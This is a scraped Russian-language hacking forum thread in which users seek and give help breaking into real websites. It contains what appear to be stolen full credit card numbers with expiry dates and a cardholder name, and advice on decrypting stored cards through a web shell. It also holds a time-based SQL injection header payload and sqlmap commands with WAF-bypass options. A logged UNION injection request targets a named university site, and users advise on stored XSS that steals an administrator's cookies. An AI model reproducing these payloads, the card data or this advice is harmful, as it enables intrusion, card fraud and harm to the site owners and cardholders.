• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

у меня было бейс64(аес256(ша512))), тут чисто надо брать искать делать, мб х#й что получишь т.к. есть платеги , которые ключи держат у себя на серверах и оно не может быть россшифровано впринципи, смотри код сайта, сейчас карты хранятся мало где и их шифруют или искажают по максимуму, т.к. за это штрафы ебейшие в юса,еу, чисто брейн три хранит чисто первые 4-5 номеров цц остальное все звездочки, некоторые хранят транзакшн ид и так далее, потому надо смотреть код и уже смотреть на месте, может кстати просто прописать в шелле ф-цию росшивроки карт и россшифровать их(если не вышло найти код россшифровки), надо искать запросы к бд в коде связаные с таблицей с картами...
там еще много чего хранится, помимо пассов, почт, номеров, адресов, сообщений при покупке.
Есть сокращения привязанной оплаты видимо, несколько подобных таблиц

Amex ending in 7008
Visa ending in 6123
Visa ending in 0264
Amex ending in 2000
Discover/Novus ending in 6523
Amex ending in 4003
Visa ending in 0502
Visa ending in 7567
mail-in
Visa ending in 8279
Amex ending in 1002
Visa ending in 8629
MasterCard ending in 1294
MasterCard ending in 9677
MasterCard ending in 8552
money order
Amex ending in 2002
Visa ending in 5312
Amex ending in 2009
Visa ending in 9656
Visa ending in 4327
Visa ending in 7254
Amex ending in 1001
Visa ending in 8303
Visa ending in 5127
paid
Paypal
Visa 4264290265003202 exp 02/05
Paypal
MC 5491130184770931 exp. 09/04
"4246312000043971 Ken Steben, S
Paypal
Visa 4731625001012733 exp 05/05
 
Код:
GET / HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
X-Forwarded-For: DePcQ0'XOR(if(now()=sysdate(),sleep(6.218),0))XOR'Z
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: site.com
Connection: Keep-alive
Кто подскажет как раскрутить? Окунь нашел
 
Возможно ли узнать path от админки prestashop с помощью бд(Гуглил, но нужной инфу так и не нашел информации об этом)? как например в мадженто path храниться в таблице core_config_data
 
Код:
GET / HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
X-Forwarded-For: DePcQ0'XOR(if(now()=sysdate(),sleep(6.218),0))XOR'Z
X-Requested-With: XMLHttpRequest
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: site.com
Connection: Keep-alive
Кто подскажет как раскрутить? Окунь нашел
sqlmap.py -u "https://site.com/" --header="X-Forwarded-For: cтавишь ориг значение" -p X-Forwarded-For --level 5 --risk 3 --random-agent --batch --dbs, по желанию можешь поставить --tamper и technique=T
 
sqlmap.py -u "https://site.com/" --header="X-Forwarded-For: cтавишь ориг значение" -p X-Forwarded-For --level 5 --risk 3 --random-agent --batch --dbs, по желанию можешь поставить --tamper и technique=T
У меня на заголовок x-forwarded-for ошибка вылезает
 
Что можно придумать если фаервол блочиит table_name(wp_users и остальные) при дампе? (булеан sqli)
ты что пытаешься сделать? вывести юзеров? или колонки получить?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
recently i got into a ip on web at first it returned ssl peer has no certificate for the requested DNS name and.
later i enumurate it by guessing ports and returned This address is restricted Access to the port number given has been disabled for security reasons...
finaly i went into about:config modify network.security.ports.banned.override to access ip:port returned again ssl peer has no certificate for the requested DNS name.
whats happening here is it vulnerable to anything???
note: the ip got it from X domain ip address lookup
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Приветствую. У меня есть чекер,что нахожит XSS уязвимости на сайте.
Потом я ручками проверяю, где-нибудь в строке Search на сайте. Дальше,что мне удалось изведать,чтобы настроить какой либо редирект на свой сайт, с помощью такой уязвимости js код на сайте должен быть хранимый.

Вопрос 1. Как понять какой js код на сайте находится, хранимый(где я смогу повесить свои редиректы с ресурса на свой и он зафиксируется или серверный(который доступен только по ссылке если сделать изменения)
Вопрос 2. Если я разобрался,что допустим js хранимый, то как и куда,что вставлять и какой скрипт,чтобы при переходе на страницу сайта например, редиректило на мой ресурс.
Вопрос 3. Либо первые два вопроса всё фигна и имея XSS уязвимость в любом вале можно настроить редирект






Screenshot_1.png
 
Приветствую. У меня есть чекер,что нахожит XSS уязвимости на сайте.
Потом я ручками проверяю, где-нибудь в строке Search на сайте. Дальше,что мне удалось изведать,чтобы настроить какой либо редирект на свой сайт, с помощью такой уязвимости js код на сайте должен быть хранимый.

Вопрос 1. Как понять какой js код на сайте находится, хранимый(где я смогу повесить свои редиректы с ресурса на свой и он зафиксируется или серверный(который доступен только по ссылке если сделать изменения)
Вопрос 2. Если я разобрался,что допустим js хранимый, то как и куда,что вставлять и какой скрипт,чтобы при переходе на страницу сайта например, редиректило на мой ресурс.
Вопрос 3. Либо первые два вопроса всё фигна и имея XSS уязвимость в любом вале можно настроить редирект






Посмотреть вложение 77203
У тебя на скрине reflective xss, он не сохраняется в бд сайта нигде а отражается от ссылки url на html странице
Если в таком простом случае не сработала защита, можешь поискать места вроде профиля, комментариев, любые места где твой ввод будет попадать в бд вроде имени твоего профиля, публичной почты, и такого
Как вариант еще ты можешь составить xss так что бы заставить по ней перейти админа каким либо способов, сама же xss должна будет отправить document.cookie и возможно иные данные вроде headers или oauth которые понадобятся тебе позже для входа админом
 
%D0%A1%D0%BA%D1%80%D0%B8%D0%BD%D1%88%D0%BE%D1%82-17-02-2024%2011:51:59.png


В окуне нашёл sql но sqlmap отказывается принимать . Пишет что не удалось найти уязвимый пораметр .
Если есть такая ошибка это значит что дыра есть или может быть ложно-положительна ?

sqlmap -u "https://site?p=@@TFC4x" --dbs --tamper="between" --random-agent --batch --time-sec=10 --level=5 --risk=3
 
Пожалуйста, обратите внимание, что пользователь заблокирован
У тебя на скрине reflective xss, он не сохраняется в бд сайта нигде а отражается от ссылки url на html странице
Если в таком простом случае не сработала защита, можешь поискать места вроде профиля, комментариев, любые места где твой ввод будет попадать в бд вроде имени твоего профиля, публичной почты, и такого
Как вариант еще ты можешь составить xss так что бы заставить по ней перейти админа каким либо способов, сама же xss должна будет отправить document.cookie и возможно иные данные вроде headers или oauth которые понадобятся тебе позже для входа админом
Огромное спасибо тебе за подсказку. Смею ещё спросить, а как по коду определить в каких местах такая дыра доступна?
 
Огромное спасибо тебе за подсказку. Смею ещё спросить, а как по коду определить в каких местах такая дыра доступна?
Просто как пример .
Ели там есть твой профиль юзера и ты можешь написать там что-то (вроде пункта "о себе") и туда получается поместить js код тогда пиши туда и проси админа чекнуть твой профиль .
Надеюсь смог обьяснить *)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Просто как пример .
Ели там есть твой профиль юзера и ты можешь написать там что-то (вроде пункта "о себе") и туда получается поместить js код тогда пиши туда и проси админа чекнуть твой профиль .
Надеюсь смог обьяснить *)
Да,я тебя теоретически понял, я на практике это не умею просто. Может подскажешь гайды,как искать все эти уязвимости на сайте и как правильно применять такие места как типо Комментарии и прочие разделы, куда я могу свой код повесить
 
############################################################################

HTTP request [#524]:
POST /egresadosapp/saveinfoegresado.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://cunori.edu.gt/
Cookie: ch_sid=7vp0418earslshisqg7agb0p6g
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: cunori.edu.gt
Content-length: 2281
Connection: close

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"

-9620)/**/UNION%09ALL%09SELECT%0911,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,CONCAT(0x7170716a71,0x6b666947564a6e7459696f61754b4f68535a4b4d456a776276726d59444d58787845466b696b4b66,0x71717a7671),11,11,11,11,11,11,11,11,11,11,11,11,11--/**/-
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="first1name"

tGhYxqFm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="first2name"

tGhYxqFm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="first3name"

tGhYxqFm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="last1name"

tGhYxqFm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="last2name"

tGhYxqFm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="last3name"

tGhYxqFm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="birthdate"

06-01-2024
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="domicilio"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="telefonos"

555-666-0606
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="email"

testing@example.com
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="tesis"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="especialidades"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="premios"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="trabajo"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="cargo1"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="empresa1"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="cargo2"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="empresa2"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="cargo3"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="empresa3"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="cargo4"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="empresa4"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="observaciones"

1

------------YWJkMTQzNDcw--


HTTP response [#524] (200 OK):
Date: Sat, 17 Feb 2024 17:33:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tFp51yFbMNW5Vu5F4yEmqHoS5zrDrNwMuTBdrIVBrYxrPYUITFexY2iYULlKGm3Mfphw6U1RhrUcya3916YGocilHPpk%2Bq%2FFBrU2pzgWHCcRNyHMqCwUgnTP3yKwxLY7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 856fc5f80a47f83c-CDG
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
URI: https://cunori.edu.gt/egresadosapp/saveinfoegresado.php

Execute failed: (1406) Data too long for column 'id' at row 1


############################################################################


--dbms=mysql --level=5 --risk=3 --random-agent
Подскажите пожалуйста
Как такое решить / обойти в рамках sqlmap
гугля + читая понятно данные больше для колонка 1 (ID)
 
Посмотреть вложение 77211

В окуне нашёл sql но sqlmap отказывается принимать . Пишет что не удалось найти уязвимый пораметр .
Если есть такая ошибка это значит что дыра есть или может быть ложно-положительна ?

sqlmap -u "https://site?p=@@TFC4x" --dbs --tamper="between" --random-agent --batch --time-sec=10 --level=5 --risk=3
try https://github.com/r0oth3x49/ghauri
tamper= appendnullbyte,base64encode,randomcase
and try your cookie from web request put in sqlmap or ghauri
or try to dump manual with hackbar
--headers=”X-Forwarded-For: *”
--flush-session
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх